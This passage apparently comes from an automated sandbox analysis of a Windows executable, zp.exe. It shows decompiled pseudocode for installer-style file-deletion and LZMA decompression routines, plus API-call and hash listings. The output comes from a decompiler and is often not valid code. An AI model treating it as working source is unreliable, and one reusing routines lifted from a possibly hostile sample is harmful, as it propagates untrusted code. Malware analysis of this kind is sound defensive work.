                                                            					if(_t40 == 0) {
                                                            						L31:
                                                            						__eflags = _a4;
                                                            						if(_a4 == 0) {
                                                            							L39:
                                                            							return _t40;
                                                            						}
                                                            						__eflags = _v16;
                                                            						if(_v16 != 0) {
                                                            							_t40 = E00405FE2(_t72);
                                                            							__eflags = _t40;
                                                            							if(_t40 == 0) {
                                                            								goto L39;
                                                            							}
                                                            							E0040576E(_t72);
                                                            							_t40 = E00405556(__eflags, _t72, _v8 | 0x00000001);
                                                            							__eflags = _t40;
                                                            							if(_t40 != 0) {
                                                            								return E00404FC9(0xffffffe5, _t72);
                                                            							}
                                                            							__eflags = _v8;
                                                            							if(_v8 == 0) {
                                                            								goto L33;
                                                            							}
                                                            							E00404FC9(0xfffffff1, _t72);
                                                            							return E00405B92(_t72, 0);
                                                            						}
                                                            						L33:
                                                            						 *0x423768 =  *0x423768 + 1;
                                                            						return _t40;
                                                            					}
                                                            					__eflags = _t69 & 0x00000002;
                                                            					if((_t69 & 0x00000002) == 0) {
                                                            						goto L31;
                                                            					}
                                                            					goto L5;
                                                            				}
                                                            			}


















                                                            0x004055a8
                                                            0x004055ad
                                                            0x004055b6
                                                            0x004055b9
                                                            0x004055c1
                                                            0x004055c4
                                                            0x004055c7
                                                            0x004055cf
                                                            0x004055d1
                                                            0x004055d2
                                                            0x00000000
                                                            0x004055d2
                                                            0x004055dd
                                                            0x004055e0
                                                            0x004055e0
                                                            0x004055e0
                                                            0x004055e4
                                                            0x004055f7
                                                            0x004055fe
                                                            0x00405603
                                                            0x00405607
                                                            0x00405617
                                                            0x00405609
                                                            0x0040560f
                                                            0x0040560f
                                                            0x0040561c
                                                            0x0040561f
                                                            0x0040562a
                                                            0x00405630
                                                            0x00405635
                                                            0x00405645
                                                            0x00405647
                                                            0x0040564d
                                                            0x00405650
                                                            0x00405653
                                                            0x0040570b
                                                            0x0040570b
                                                            0x0040570f
                                                            0x00405711
                                                            0x00405711
                                                            0x00405711
                                                            0x00405711
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00405659
                                                            0x00405659
                                                            0x00405662
                                                            0x00405668
                                                            0x0040566d
                                                            0x00405670
                                                            0x00405672
                                                            0x00405676
                                                            0x00405678
                                                            0x00405678
                                                            0x00405676
                                                            0x0040567b
                                                            0x0040567e
                                                            0x00405691
                                                            0x00405693
                                                            0x00405698
                                                            0x0040569f
                                                            0x004056ba
                                                            0x004056bf
                                                            0x004056c1
                                                            0x004056e5
                                                            0x004056c3
                                                            0x004056c3
                                                            0x004056c6
                                                            0x004056da
                                                            0x004056c8
                                                            0x004056cb
                                                            0x004056d3
                                                            0x004056d3
                                                            0x004056c6
                                                            0x004056a1
                                                            0x004056a7
                                                            0x004056a9
                                                            0x004056af
                                                            0x004056af
                                                            0x004056a9
                                                            0x00000000
                                                            0x0040569f
                                                            0x00405680
                                                            0x00405683
                                                            0x00405685
                                                            0x00000000
                                                            0x00000000
                                                            0x00405687
                                                            0x00405689
                                                            0x00000000
                                                            0x00000000
                                                            0x0040568b
                                                            0x0040568f
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004056ea
                                                            0x004056f4
                                                            0x004056fa
                                                            0x004056fa
                                                            0x00405705
                                                            0x00000000
                                                            0x00405705
                                                            0x00405621
                                                            0x00405628
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004055e6
                                                            0x004055e6
                                                            0x004055e8
                                                            0x00405715
                                                            0x00405717
                                                            0x0040571a
                                                            0x0040576b
                                                            0x0040576b
                                                            0x0040576b
                                                            0x0040571c
                                                            0x0040571f
                                                            0x0040572a
                                                            0x0040572f
                                                            0x00405731
                                                            0x00000000
                                                            0x00000000
                                                            0x00405734
                                                            0x00405740
                                                            0x00405745
                                                            0x00405747
                                                            0x00000000
                                                            0x00405762
                                                            0x00405749
                                                            0x0040574c
                                                            0x00000000
                                                            0x00000000
                                                            0x00405751
                                                            0x00000000
                                                            0x00405758
                                                            0x00405721
                                                            0x00405721
                                                            0x00000000
                                                            0x00405721
                                                            0x004055ee
                                                            0x004055f1
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004055f1

                                                            APIs
                                                            • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,776C2EE0,00000000), ref: 004055C7
                                                            • lstrcatA.KERNEL32(00420CE8,\*.*,00420CE8,?,?,C:\Users\user\AppData\Local\Temp\,776C2EE0,00000000), ref: 0040560F
                                                            • lstrcatA.KERNEL32(?,00409014,?,00420CE8,?,?,C:\Users\user\AppData\Local\Temp\,776C2EE0,00000000), ref: 00405630
                                                            • lstrlenA.KERNEL32(?,?,00409014,?,00420CE8,?,?,C:\Users\user\AppData\Local\Temp\,776C2EE0,00000000), ref: 00405636
                                                            • FindFirstFileA.KERNEL32(00420CE8,?,?,?,00409014,?,00420CE8,?,?,C:\Users\user\AppData\Local\Temp\,776C2EE0,00000000), ref: 00405647
                                                            • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004056F4
                                                            • FindClose.KERNEL32(00000000), ref: 00405705
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                            • String ID: "C:\Users\user\Desktop\zp.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                            • API String ID: 2035342205-2358131748
                                                            • Opcode ID: b62b88e40ae1a5b6069845eed9185053ab501b777c23ff11b8ddb97d98035749
                                                            • Instruction ID: f8ba85616855857cc059e9ef13111783737efc0c899630c1c9014c5665c50712
                                                            • Opcode Fuzzy Hash: b62b88e40ae1a5b6069845eed9185053ab501b777c23ff11b8ddb97d98035749
                                                            • Instruction Fuzzy Hash: 34510070804A04BADB21BB658D45FBF7A78DB42314F54413BF445721D2D73C8982EE6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 98%
                                                            			E004062B8() {
                                                            				unsigned short _t531;
                                                            				signed int _t532;
                                                            				void _t533;
                                                            				void* _t534;
                                                            				signed int _t535;
                                                            				signed int _t565;
                                                            				signed int _t568;
                                                            				signed int _t590;
                                                            				signed int* _t607;
                                                            				void* _t614;
                                                            
                                                            				L0:
                                                            				while(1) {
                                                            					L0:
                                                            					if( *(_t614 - 0x40) != 0) {
                                                            						 *(_t614 - 0x34) = 1;
                                                            						 *(_t614 - 0x84) = 7;
                                                            						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                                                            						L132:
                                                            						 *(_t614 - 0x54) = _t607;
                                                            						L133:
                                                            						_t531 =  *_t607;
                                                            						_t590 = _t531 & 0x0000ffff;
                                                            						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                                                            						if( *(_t614 - 0xc) >= _t565) {
                                                            							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                                                            							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                                                            							 *(_t614 - 0x40) = 1;
                                                            							_t532 = _t531 - (_t531 >> 5);
                                                            							 *_t607 = _t532;
                                                            						} else {
                                                            							 *(_t614 - 0x10) = _t565;
                                                            							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                            							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                                                            						}
                                                            						if( *(_t614 - 0x10) >= 0x1000000) {
                                                            							L139:
                                                            							_t533 =  *(_t614 - 0x84);
                                                            							L140:
                                                            							 *(_t614 - 0x88) = _t533;
                                                            							goto L1;
                                                            						} else {
                                                            							L137:
                                                            							if( *(_t614 - 0x6c) == 0) {
                                                            								 *(_t614 - 0x88) = 5;
                                                            								goto L170;
                                                            							}
                                                            							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                                                            							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                            							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                            							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                            							goto L139;
                                                            						}
                                                            					} else {
                                                            						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                            						__esi =  *(__ebp - 0x60);
                                                            						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                            						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                            						__ecx =  *(__ebp - 0x3c);
                                                            						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                            						__ecx =  *(__ebp - 4);
                                                            						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                            						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                            						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                            						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                            						if( *(__ebp - 0x38) >= 4) {
                                                            							if( *(__ebp - 0x38) >= 0xa) {
                                                            								_t97 = __ebp - 0x38;
                                                            								 *_t97 =  *(__ebp - 0x38) - 6;
                                                            							} else {
                                                            								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                            							}
                                                            						} else {
                                                            							 *(__ebp - 0x38) = 0;
                                                            						}
                                                            						if( *(__ebp - 0x34) == __edx) {
                                                            							__ebx = 0;
                                                            							__ebx = 1;
                                                            							L60:
                                                            							__eax =  *(__ebp - 0x58);
                                                            							__edx = __ebx + __ebx;
                                                            							__ecx =  *(__ebp - 0x10);
                                                            							__esi = __edx + __eax;
                                                            							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                            							__ax =  *__esi;
                                                            							 *(__ebp - 0x54) = __esi;
                                                            							__edi = __ax & 0x0000ffff;
                                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            							if( *(__ebp - 0xc) >= __ecx) {
                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            								__cx = __ax;
                                                            								_t216 = __edx + 1; // 0x1
                                                            								__ebx = _t216;
                                                            								__cx = __ax >> 5;
                                                            								 *__esi = __ax;
                                                            							} else {
                                                            								 *(__ebp - 0x10) = __ecx;
                                                            								0x800 = 0x800 - __edi;
                                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            								__ebx = __ebx + __ebx;
                                                            								 *__esi = __cx;
                                                            							}
                                                            							 *(__ebp - 0x44) = __ebx;
                                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                                            								L59:
                                                            								if(__ebx >= 0x100) {
                                                            									goto L54;
                                                            								}
                                                            								goto L60;
                                                            							} else {
                                                            								L57:
                                                            								if( *(__ebp - 0x6c) == 0) {
                                                            									 *(__ebp - 0x88) = 0xf;
                                                            									goto L170;
                                                            								}
                                                            								__ecx =  *(__ebp - 0x70);
                                                            								__eax =  *(__ebp - 0xc);
                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            								_t202 = __ebp - 0x70;
                                                            								 *_t202 =  *(__ebp - 0x70) + 1;
                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            								goto L59;
                                                            							}
                                                            						} else {
                                                            							__eax =  *(__ebp - 0x14);
                                                            							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            							if(__eax >=  *(__ebp - 0x74)) {
                                                            								__eax = __eax +  *(__ebp - 0x74);
                                                            							}
                                                            							__ecx =  *(__ebp - 8);
                                                            							__ebx = 0;
                                                            							__ebx = 1;
                                                            							__al =  *((intOrPtr*)(__eax + __ecx));
                                                            							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                            							L40:
                                                            							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                            							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                            							__ecx =  *(__ebp - 0x58);
                                                            							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                            							 *(__ebp - 0x48) = __eax;
                                                            							__eax = __eax + 1;
                                                            							__eax = __eax << 8;
                                                            							__eax = __eax + __ebx;
                                                            							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            							__ax =  *__esi;
                                                            							 *(__ebp - 0x54) = __esi;
                                                            							__edx = __ax & 0x0000ffff;
                                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                            							if( *(__ebp - 0xc) >= __ecx) {
                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            								__cx = __ax;
                                                            								 *(__ebp - 0x40) = 1;
                                                            								__cx = __ax >> 5;
                                                            								__ebx = __ebx + __ebx + 1;
                                                            								 *__esi = __ax;
                                                            							} else {
                                                            								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                            								 *(__ebp - 0x10) = __ecx;
                                                            								0x800 = 0x800 - __edx;
                                                            								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                            								__ebx = __ebx + __ebx;
                                                            								 *__esi = __cx;
                                                            							}
                                                            							 *(__ebp - 0x44) = __ebx;
                                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                                            								L38:
                                                            								__eax =  *(__ebp - 0x40);
                                                            								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                            									while(1) {
                                                            										if(__ebx >= 0x100) {
                                                            											break;
                                                            										}
                                                            										__eax =  *(__ebp - 0x58);
                                                            										__edx = __ebx + __ebx;
                                                            										__ecx =  *(__ebp - 0x10);
                                                            										__esi = __edx + __eax;
                                                            										__ecx =  *(__ebp - 0x10) >> 0xb;
                                                            										__ax =  *__esi;
                                                            										 *(__ebp - 0x54) = __esi;
                                                            										__edi = __ax & 0x0000ffff;
                                                            										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            										if( *(__ebp - 0xc) >= __ecx) {
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            											__cx = __ax;
                                                            											_t169 = __edx + 1; // 0x1
                                                            											__ebx = _t169;
                                                            											__cx = __ax >> 5;
                                                            											 *__esi = __ax;
                                                            										} else {
                                                            											 *(__ebp - 0x10) = __ecx;
                                                            											0x800 = 0x800 - __edi;
                                                            											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            											__ebx = __ebx + __ebx;
                                                            											 *__esi = __cx;
                                                            										}
                                                            										 *(__ebp - 0x44) = __ebx;
                                                            										if( *(__ebp - 0x10) < 0x1000000) {
                                                            											L45:
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												 *(__ebp - 0x88) = 0xe;
                                                            												goto L170;
                                                            											}
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t155 = __ebp - 0x70;
                                                            											 *_t155 =  *(__ebp - 0x70) + 1;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            										}
                                                            									}
                                                            									L53:
                                                            									_t172 = __ebp - 0x34;
                                                            									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                                                            									L54:
                                                            									__al =  *(__ebp - 0x44);
                                                            									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                            									L55:
                                                            									if( *(__ebp - 0x64) == 0) {
                                                            										 *(__ebp - 0x88) = 0x1a;
                                                            										goto L170;
                                                            									}
                                                            									__ecx =  *(__ebp - 0x68);
                                                            									__al =  *(__ebp - 0x5c);
                                                            									__edx =  *(__ebp - 8);
                                                            									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                            									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                            									 *( *(__ebp - 0x68)) = __al;
                                                            									__ecx =  *(__ebp - 0x14);
                                                            									 *(__ecx +  *(__ebp - 8)) = __al;
                                                            									__eax = __ecx + 1;
                                                            									__edx = 0;
                                                            									_t191 = __eax %  *(__ebp - 0x74);
                                                            									__eax = __eax /  *(__ebp - 0x74);
                                                            									__edx = _t191;
                                                            									L79:
                                                            									 *(__ebp - 0x14) = __edx;
                                                            									L80:
                                                            									 *(__ebp - 0x88) = 2;
                                                            									goto L1;
                                                            								}
                                                            								if(__ebx >= 0x100) {
                                                            									goto L53;
                                                            								}
                                                            								goto L40;
                                                            							} else {
                                                            								L36:
                                                            								if( *(__ebp - 0x6c) == 0) {
                                                            									 *(__ebp - 0x88) = 0xd;
                                                            									L170:
                                                            									_t568 = 0x22;
                                                            									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                                                            									_t535 = 0;
                                                            									L172:
                                                            									return _t535;
                                                            								}
                                                            								__ecx =  *(__ebp - 0x70);
                                                            								__eax =  *(__ebp - 0xc);
                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            								_t121 = __ebp - 0x70;
                                                            								 *_t121 =  *(__ebp - 0x70) + 1;
                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            								goto L38;
                                                            							}
                                                            						}
                                                            					}
                                                            					L1:
                                                            					_t534 =  *(_t614 - 0x88);
                                                            					if(_t534 > 0x1c) {
                                                            						L171:
                                                            						_t535 = _t534 | 0xffffffff;
                                                            						goto L172;
                                                            					}
                                                            					switch( *((intOrPtr*)(_t534 * 4 +  &M00406B5B))) {
                                                            						case 0:
                                                            							if( *(_t614 - 0x6c) == 0) {
                                                            								goto L170;
                                                            							}
                                                            							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                            							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                            							_t534 =  *( *(_t614 - 0x70));
                                                            							if(_t534 > 0xe1) {
                                                            								goto L171;
                                                            							}
                                                            							_t538 = _t534 & 0x000000ff;
                                                            							_push(0x2d);
                                                            							asm("cdq");
                                                            							_pop(_t570);
                                                            							_push(9);
                                                            							_pop(_t571);
                                                            							_t610 = _t538 / _t570;
                                                            							_t540 = _t538 % _t570 & 0x000000ff;
                                                            							asm("cdq");
                                                            							_t605 = _t540 % _t571 & 0x000000ff;
                                                            							 *(_t614 - 0x3c) = _t605;
                                                            							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                                                            							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                            							_t613 = (0x300 << _t605 + _t610) + 0x736;
                                                            							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                                                            								L10:
                                                            								if(_t613 == 0) {
                                                            									L12:
                                                            									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                                                            									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                            									goto L15;
                                                            								} else {
                                                            									goto L11;
                                                            								}
                                                            								do {
                                                            									L11:
                                                            									_t613 = _t613 - 1;
                                                            									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                                                            								} while (_t613 != 0);
                                                            								goto L12;
                                                            							}
                                                            							if( *(_t614 - 4) != 0) {
                                                            								GlobalFree( *(_t614 - 4));
                                                            							}
                                                            							_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                            							 *(_t614 - 4) = _t534;
                                                            							if(_t534 == 0) {
                                                            								goto L171;
                                                            							} else {
                                                            								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                                                            								goto L10;
                                                            							}
                                                            						case 1:
                                                            							L13:
                                                            							__eflags =  *(_t614 - 0x6c);
                                                            							if( *(_t614 - 0x6c) == 0) {
                                                            								 *(_t614 - 0x88) = 1;
                                                            								goto L170;
                                                            							}
                                                            							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                            							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                                                            							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                            							_t45 = _t614 - 0x48;
                                                            							 *_t45 =  *(_t614 - 0x48) + 1;
                                                            							__eflags =  *_t45;
                                                            							L15:
                                                            							if( *(_t614 - 0x48) < 4) {
                                                            								goto L13;
                                                            							}
                                                            							_t546 =  *(_t614 - 0x40);
                                                            							if(_t546 ==  *(_t614 - 0x74)) {
                                                            								L20:
                                                            								 *(_t614 - 0x48) = 5;
                                                            								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                                                            								goto L23;
                                                            							}
                                                            							 *(_t614 - 0x74) = _t546;
                                                            							if( *(_t614 - 8) != 0) {
                                                            								GlobalFree( *(_t614 - 8));
                                                            							}
                                                            							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                                                            							 *(_t614 - 8) = _t534;
                                                            							if(_t534 == 0) {
                                                            								goto L171;
                                                            							} else {
                                                            								goto L20;
                                                            							}
                                                            						case 2:
                                                            							L24:
                                                            							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                                                            							 *(_t614 - 0x84) = 6;
                                                            							 *(_t614 - 0x4c) = _t553;
                                                            							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                                                            							goto L132;
                                                            						case 3:
                                                            							L21:
                                                            							__eflags =  *(_t614 - 0x6c);
                                                            							if( *(_t614 - 0x6c) == 0) {
                                                            								 *(_t614 - 0x88) = 3;
                                                            								goto L170;
                                                            							}
                                                            							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                            							_t67 = _t614 - 0x70;
                                                            							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                                                            							__eflags =  *_t67;
                                                            							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                            							L23:
                                                            							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                                                            							if( *(_t614 - 0x48) != 0) {
                                                            								goto L21;
                                                            							}
                                                            							goto L24;
                                                            						case 4:
                                                            							goto L133;
                                                            						case 5:
                                                            							goto L137;
                                                            						case 6:
                                                            							goto L0;
                                                            						case 7:
                                                            							__eflags =  *(__ebp - 0x40) - 1;
                                                            							if( *(__ebp - 0x40) != 1) {
                                                            								__eax =  *(__ebp - 0x24);
                                                            								 *(__ebp - 0x80) = 0x16;
                                                            								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                            								__eax =  *(__ebp - 0x28);
                                                            								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                            								__eax =  *(__ebp - 0x2c);
                                                            								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                            								__eax = 0;
                                                            								__eflags =  *(__ebp - 0x38) - 7;
                                                            								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                            								__al = __al & 0x000000fd;
                                                            								__eax = (__eflags >= 0) - 1 + 0xa;
                                                            								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                            								__eax =  *(__ebp - 4);
                                                            								__eax =  *(__ebp - 4) + 0x664;
                                                            								__eflags = __eax;
                                                            								 *(__ebp - 0x58) = __eax;
                                                            								goto L68;
                                                            							}
                                                            							__eax =  *(__ebp - 4);
                                                            							__ecx =  *(__ebp - 0x38);
                                                            							 *(__ebp - 0x84) = 8;
                                                            							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                            							goto L132;
                                                            						case 8:
                                                            							__eflags =  *(__ebp - 0x40);
                                                            							if( *(__ebp - 0x40) != 0) {
                                                            								__eax =  *(__ebp - 4);
                                                            								__ecx =  *(__ebp - 0x38);
                                                            								 *(__ebp - 0x84) = 0xa;
                                                            								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                            							} else {
                                                            								__eax =  *(__ebp - 0x38);
                                                            								__ecx =  *(__ebp - 4);
                                                            								__eax =  *(__ebp - 0x38) + 0xf;
                                                            								 *(__ebp - 0x84) = 9;
                                                            								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                            								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                            							}
                                                            							goto L132;
                                                            						case 9:
                                                            							__eflags =  *(__ebp - 0x40);
                                                            							if( *(__ebp - 0x40) != 0) {
                                                            								goto L89;
                                                            							}
                                                            							__eflags =  *(__ebp - 0x60);
                                                            							if( *(__ebp - 0x60) == 0) {
                                                            								goto L171;
                                                            							}
                                                            							__eax = 0;
                                                            							__eflags =  *(__ebp - 0x38) - 7;
                                                            							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                            							__eflags = _t258;
                                                            							0 | _t258 = _t258 + _t258 + 9;
                                                            							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                            							goto L75;
                                                            						case 0xa:
                                                            							__eflags =  *(__ebp - 0x40);
                                                            							if( *(__ebp - 0x40) != 0) {
                                                            								__eax =  *(__ebp - 4);
                                                            								__ecx =  *(__ebp - 0x38);
                                                            								 *(__ebp - 0x84) = 0xb;
                                                            								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                            								goto L132;
                                                            							}
                                                            							__eax =  *(__ebp - 0x28);
                                                            							goto L88;
                                                            						case 0xb:
                                                            							__eflags =  *(__ebp - 0x40);
                                                            							if( *(__ebp - 0x40) != 0) {
                                                            								__ecx =  *(__ebp - 0x24);
                                                            								__eax =  *(__ebp - 0x20);
                                                            								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                            							} else {
                                                            								__eax =  *(__ebp - 0x24);
                                                            							}
                                                            							__ecx =  *(__ebp - 0x28);
                                                            							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                            							L88:
                                                            							__ecx =  *(__ebp - 0x2c);
                                                            							 *(__ebp - 0x2c) = __eax;
                                                            							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                            							L89:
                                                            							__eax =  *(__ebp - 4);
